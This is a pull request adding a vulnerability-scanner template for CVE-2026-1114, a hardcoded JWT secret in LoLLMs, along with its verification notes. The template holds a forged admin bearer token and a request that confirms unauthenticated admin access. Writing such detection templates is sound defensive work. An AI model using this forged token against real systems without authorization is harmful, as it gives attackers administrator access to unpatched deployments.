### PR TITLE
Add CVE-2026-1114 template

### DIFF
--- a/http/cves/2026/CVE-2026-1114.yaml
+++ b/http/cves/2026/CVE-2026-1114.yaml
@@ -1,0 +1,44 @@
+id: CVE-2026-1114
+
+info:
+  name: LoLLMs - Hardcoded JWT Secret Authentication Bypass
+  author: str4k3r
+  severity: critical
+  description: >
+    LoLLMs through 2.1.0 signs authentication tokens with a hardcoded default
+    SECRET_KEY when no override is configured. A forged HS256 token for the
+    default admin account is accepted by the authentication API without prior
+    authentication. The request below only asks for the caller identity and
+    does not modify application state.
+  reference:
+    - https://github.com/ParisNeo/lollms/commit/f577838da1dc1654f89754252e762f8483a75a1a
+    - https://github.com/ParisNeo/lollms/commit/a2f10ca90129cd8a3a01474562d50d3089eb8c85
+    - https://github.com/ParisNeo/lollms/blob/v2.1.0/backend/config.py
+  classification:
+    cve-id: CVE-2026-1114
+    cwe-id: CWE-798
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: parisneo
+    product: lollms
+    technology: python, fastapi, jwt
+  tags: cve,cve2026,lollms,auth-bypass,unauth,jwt
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/auth/me"
+    headers:
+      Authorization: "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6NDA3MDkwODgwMH0.rn8IJsP4vK__y3RiurdhZZwGQu5P_Oltph-fH8LaT4g"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - '"username":"admin"'
+          - '"is_admin":true'
+        condition: and


### PR DESCRIPTION
## Verification

This is a behavior-based check for the LoLLMs hardcoded JWT secret issue. It
sends one forged default-admin token to the identity endpoint and requires an
HTTP 200 response containing both the admin username and administrator claim.
The request is read-only and does not create or alter data.

The upstream security fix replaces the weak default with an automatically
generated secret:
https://github.com/ParisNeo/lollms/commit/f577838da1dc1654f89754252e762f8483a75a1a